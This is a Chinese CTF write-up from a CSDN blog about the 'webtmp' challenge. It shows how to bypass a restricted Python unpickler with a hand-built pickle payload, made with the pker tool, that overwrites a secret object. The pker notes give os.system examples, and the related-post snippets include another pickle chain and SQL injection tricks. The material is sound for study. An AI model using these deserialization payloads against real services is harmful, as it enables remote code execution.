高校战疫网络安全分享赛: webtmp

于 2022-01-17 23:09:56 发布
阅读量2.8k 收藏
点赞数
文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/122549074
版权

源码

打开后的页面

点击here可以看到源码,关键处代码

当满足Animal类中对象的name和category属性和secret内的两个属性的值吻合即可getflag

这里还限制了‘R',并且RestrictedUnpickler函数使得我们只能使用mian中模块。

 所以可以导入secret然后再覆盖secret变量的值

手写opcode有些困难,所以利用pker工具

pker代码放到1.txt中

secret=GLOBAL('__main__', 'secret') # python的执行文件被解析为__main__对象,secret在该对象从属下
secret.name='1'
secret.category='2'
animal = INST('__main__', 'Animal','1','2')
return animal



GLOBAL
对应opcode:b'c'
获取module下的一个全局对象(没有import的也可以,比如下面的os):
GLOBAL('os', 'system')
输入:module,instance(callable、module都是instance)  

INST
对应opcode:b'i'
建立并入栈一个对象(可以执行一个函数):
INST('os', 'system', 'ls')  
输入:module,callable,para

 利用脚本将\n还原为回车

a="c__main__\nsecret\np0\n0g0\n(}(S'name'\nS'1'\ndtbg0\n(}(S'category'\nS'2'\ndtb(S'1'\nS'2'\ni__main__\nAnimal\np3\n0g3\n."
a =a.encode('ascii').decode('unicode_escape')
print(a)

base64编码后提交即可获得flag

参考文章:
https://xz.aliyun.com/t/7436#toc-17 

Uzero.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XCTF 高校战“疫”网络安全分享 WEB_WP
qq_40648358的博客
03-10 2429
文章目录XCTF 高校战“疫”网络安全分享easy_trick_gzmtuhackmefmkqPHP-UAFnwebsqlcheckin XCTF 高校战“疫”网络安全分享 easy_trick_gzmtu 首先说一下这个题的脑洞确实强 打开题目后,是一个好看的博客,源码里提示?time=Y或者?time=2020 测试得存在盲注的,但是当构造payload的时候,一直是500,猜测是...
python pickle反序列化漏洞_python pickle从零构造反序列化攻击利用
weixin_39743414的博客
12-17 165
有一篇很好的文章对此讲的很详细https://xz.aliyun.com/t/7436#toc-0此外我对文章中的手写反序列化一块进行一些补充几道例题Code-Breaking:picklecode原payload:b'''cbuiltinsgetattrp0(cbuiltinsdictS'get'tRp1cbuiltinsglobals)Rp200g1(g2S'builtins'tRp30g0(...
高校战“疫”网络安全分享 —— Write-up
a3320315的博客
03-30 2382
Guessgame 这道题目当时没做出来,后来复现的时候,发现挺有意思的,题目中主要有三个考点 JS的大小写特征 原型链污染 redos盲注 这儿主要着重介绍一下第三个考点 JS的 exec test RegExp match replace spite可以造成redos盲注 /([a-z]+)+$/.exec('aaaaaaaaaaaaaaaaaaaaaaaaaaaa!'); /Runoo...
XCTF高校战”疫”分享
12-22
sqlcheckin sql注入 https://blog.csdn.net/nzjdsds/article/details/82980041 直接看例子: like也是一样 false false 得到true,令username:xxx’=’,password:xxx’=’,payload: char(61)用来绕过= username=xxx’+char(61)+’&password=xxx’+char(61)+’ webtmp 源码 import base64 import io import sys import pickle from flask import
XCTF高校战“疫”网络安全分享(隐藏的信息)
hhh
03-14 995
知识点: 双音多频(拨号音隐写) 二维码相关知识 解压完是一个残缺的二维码和一个压缩包。压缩包是加密的,所以我们先看二维码。 二维码很容易看出来需要反色+补上三个小黑块(用于位置探测)(讲真,我以前一直觉得二维码是个很特殊的东西,每一个二维码都是独一无二的,毕竟你看扫出来的东西都不一样嘛……) 这张图片缺少的是位置探测区,这三个小黑块用来确定二维码的大小和位置,帮助我们正确定位二维码里的数...
HDFS的web网页中点击tmp目录出现以下错误
Aplopyu的博客
12-03 1610
HDFS的web网页中点击tmp目录出现以下错误 Permission denied: user=dr.who, access=READ_EXECUTE, inode="/tmp":root:supergroup:drwx------ 解决方法: 输入这行代码,修改权限即可 参考网址:(14条消息) Hadoop 2.8.5 Permission denied: user=dr.who, access=READ_EXECUTE, inode=“/user:root问题解决_北京小辉-CSDN博客 ...
tmp目录下文件被删除
dolores_peng的博客
12-05 2589
描述:线上服务器tmp目录下有一目录用来接收部署系统发送的压缩文件并解压到运行目录,但是该目录多次消失导致部署报错 分析:想起来centos6系统中有tmpwatch文件配置tmp目录内容自动清除机制,查询发现centos7下改为systemd-tmpfiles-setup.service服务统一控制,其配置文件在/usr/lib/tmpfiles.d/tmp.conf v /tmp 1777
陇原战疫2021网络安全 Web
feng的博客
11-08 5439
前言 题挺有意思的,Web有点难,而且后面三道难题放的有点晚了,时间不够(肝了一下午的Java)。这个比的难度,能早9晚9的话可能还好一些,早9晚5就有点紧了。 Java还是太菜了,需要学很多的东西。 eaaasyphp 反序列化链的构造很简单就不提了,正常构造写文件发现应该是不行的,目录应该不可写。给了个Hint类里面提示phpinfo,那打一下phpinfo看一下: class Bypass { public function __construct(){ $this->
高校战“疫”网络安全分享
辰星的博客
03-09 2872
2020疫情期间高校战“疫”网络安全分享,个人做出的部分WP。不足之处见谅。 MISC 简单MISC 提示为简单隐写术。附件中一张jpg图片和一个名为flag.zip的加密压缩包,很明显是让我们利用jpg获得密码解压压缩包。 我们猜测这个图片中可能存在.txt文件保存密码,16进制查看器中查看下验证猜想。 在kali中利用binwalk分离出来,并查看 得到莫尔斯码,解码得到密码,解码压缩...
高校战疫网络安全分享部分WP
qq_41252520的博客
03-10 1043
文章目录前言Reverse0x0 Cycle graph0x1 天津垓0x2 fxck!PWN0x0 easyheap0x1 woodenbox2 前言 这场团队,我个人进入状态很慢,第一天傍晚才开始做出一道题,这与本次比的题目质量也有关。这次比题目平均质量比I春秋公益要高。作为队伍中的一员,我个人仅贡献出了3道题的分数。另外有2道逆向题各有所惑,感觉只差那一步。后面也会说明一下,...
2020 高校战“疫”网络安全分享 musl
yongbaoii的博客
06-25 788
因为2021 强网杯出了一道musl pwn,然后找到了这个题目,一起学习学习。 运行程序的话首先要装musl的驱动 没有开pie。 刚开始先申请空间。 空间是可读可写的。 assign 最多申请16个chunk,我们有一次溢出的机会。 destory 都清干净了。 transform 就改一下里面的内容。 examine 就是输出,但是只能有一次机会。 程序读完我们来看看musl libc的内容。 musl libc 是一个专门为嵌入式系统开发的轻量级 libc 库,以简单、轻量和高效率为特
高校战“疫”网络安全分享Writeup——天津垓
qq_43557177的博客
03-10 879
拿到题目,发现由于缺少cygwin1.dll本机并没有办法运行,但是题还是要做的 直接拖进IDA里,进行分析,查找字符串 看起来是有点东西,双击其中一个 然后按住x查找引用 但是目测这个函数并不能帮到我们,继续对函数名称查找引用 进入第一个函数,有点东西了 大体逻辑是将字符串“Rising_Hopper!”作为key,v1到v18作为数组Number,遍历输入Str,满足一个简单逻辑,Pyt...
2020新春战疫网络安全公益部分web writeup
st0ut的博客
02-25 1667
前言 最近因为疫情,在家里都没怎么出门,正好i春秋平台举办了2020新春战疫网络安全公益。学到了一些骚姿势,师傅们都tql了。。。 DAY1 简单的招聘系统 打开页面发现是一个登陆框,直接注册账号登陆进去。发现需要管理员登陆,才能解锁新功能。 在那里xss了半天,没有结果。。。。 最后重新回到登陆页面,使用万能密码登陆,发现能登进去,但是是我刚刚注册的账号,于是重新下发题目,,直接万能密码登陆,...
php x00x00x00x00x00x00rxdf,GXZYCTF部分Web Writeup
weixin_31290873的博客
03-17 2769
很长一段时间没有接触了,都沉迷于课程学习不能自拔(被迫的),果然2020年对题目都失去了感觉,不仅如此,刚打开就想x了......,简单先整理一下做出来的题。之后文章主要发在个人博客:Cyc1e's Blog0x00 Webtmp题目源码import base64import ioimport sysimport picklefrom flask import Flask, Response, r...
ASP网上拍卖系统设计与实现(论文+源代码+开题报告).rar
08-10
资源包主要包含以下内容: ASP项目源码:每个资源包中都包含完整的ASP项目源码,这些源码采用了经典的ASP技术开发,结构清晰、注释详细,帮助用户轻松理解整个项目的逻辑和实现方式。通过这些源码,用户可以学习到ASP的基本语法、服务器端脚本编写方法、数据库操作、用户权限管理等关键技术。 数据库设计文件:为了方便用户更好地理解系统的后台逻辑,每个项目中都附带了完整的数据库设计文件。这些文件通常包括数据库结构图、数据表设计文档,以及示例数据SQL脚本。用户可以通过这些文件快速搭建项目所需的数据库环境,并了解各个数据表之间的关系和作用。 详细的开发文档:每个资源包都附有详细的开发文档,文档内容包括项目背景介绍、功能模块说明、系统流程图、用户界面设计以及关键代码解析等。这些文档为用户提供了深入的学习材料,使得即便是从零开始的开发者也能逐步掌握项目开发的全过程。 项目演示与使用指南:为帮助用户更好地理解和使用这些ASP项目,每个资源包中都包含项目的演示文件和使用指南。演示文件通常以视频或图文形式展示项目的主要功能和操作流程,使用指南则详细说明了如何配置开发环境、部署项目以及常见问题的解决方法。 毕业设计参考:对于正在准备毕业设计的学生来说,这些资源包是绝佳的参考材料。每个项目不仅功能完善、结构清晰,还符合常见的毕业设计要求和标准。通过这些项目,学生可以学习到如何从零开始构建一个完整的Web系统,并积累丰富的项目经验。
基于Android远程监控工具设计与实现.docx
最新发布
08-10
基于Android远程监控工具设计与实现.docx
C#网络办公助理设计与实现(源代码+论文).rar
08-10
资源包主要包含以下内容: ASP项目源码:每个资源包中都包含完整的ASP项目源码,这些源码采用了经典的ASP技术开发,结构清晰、注释详细,帮助用户轻松理解整个项目的逻辑和实现方式。通过这些源码,用户可以学习到ASP的基本语法、服务器端脚本编写方法、数据库操作、用户权限管理等关键技术。 数据库设计文件:为了方便用户更好地理解系统的后台逻辑,每个项目中都附带了完整的数据库设计文件。这些文件通常包括数据库结构图、数据表设计文档,以及示例数据SQL脚本。用户可以通过这些文件快速搭建项目所需的数据库环境,并了解各个数据表之间的关系和作用。 详细的开发文档:每个资源包都附有详细的开发文档,文档内容包括项目背景介绍、功能模块说明、系统流程图、用户界面设计以及关键代码解析等。这些文档为用户提供了深入的学习材料,使得即便是从零开始的开发者也能逐步掌握项目开发的全过程。 项目演示与使用指南:为帮助用户更好地理解和使用这些ASP项目,每个资源包中都包含项目的演示文件和使用指南。演示文件通常以视频或图文形式展示项目的主要功能和操作流程,使用指南则详细说明了如何配置开发环境、部署项目以及常见问题的解决方法。 毕业设计参考:对于正在准备毕业设计的学生来说,这些资源包是绝佳的参考材料。每个项目不仅功能完善、结构清晰,还符合常见的毕业设计要求和标准。通过这些项目,学生可以学习到如何从零开始构建一个完整的Web系统,并积累丰富的项目经验。
[毕业设计]VB环境下身份证信息管理系统的设计与实现(源代码+论文).zip
08-10
[毕业设计]VB环境下身份证信息管理系统的设计与实现(源代码+论文)
node.js安装与配置以及clone代码.md
08-10
node.js安装与配置以及clone代码.md
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值